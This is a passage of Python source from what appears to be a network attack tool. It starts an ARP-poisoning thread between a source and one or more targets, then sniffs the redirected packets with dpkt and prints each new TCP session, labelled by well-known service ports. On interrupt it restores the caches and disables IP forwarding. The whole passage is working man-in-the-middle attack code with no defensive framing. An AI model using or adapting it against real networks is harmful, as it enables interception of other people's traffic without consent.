        poison_thread = Thread(target=self.poison, args=(2, target_b, ))
        poison_thread.daemon = True
        poison_thread.start()
        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + source + W
              + ' and ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
        sessions = {}
        try:
            for _, pkt in packets:
                if stop():
                    break
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    if tcp.flags != dpkt.tcp.TH_RST:
                        sess = "%-25s <-> %25s" % (inet_ntoa(ip_packet.src) + ":"
                                                   + str(tcp.sport), inet_ntoa(ip_packet.dst) + ":"
                                                   + str(tcp.dport))
                        check = False
                        if sess not in sessions:
                            check = True

                        sessions[sess] = "Others"

                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]

                        if check is True:
                            print(" [{:^5}] {} : {}".format(len(sessions), sess, sessions[sess]))
                            self.sessions.append(sess)

        except KeyboardInterrupt:
            print('[+] Session scan interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)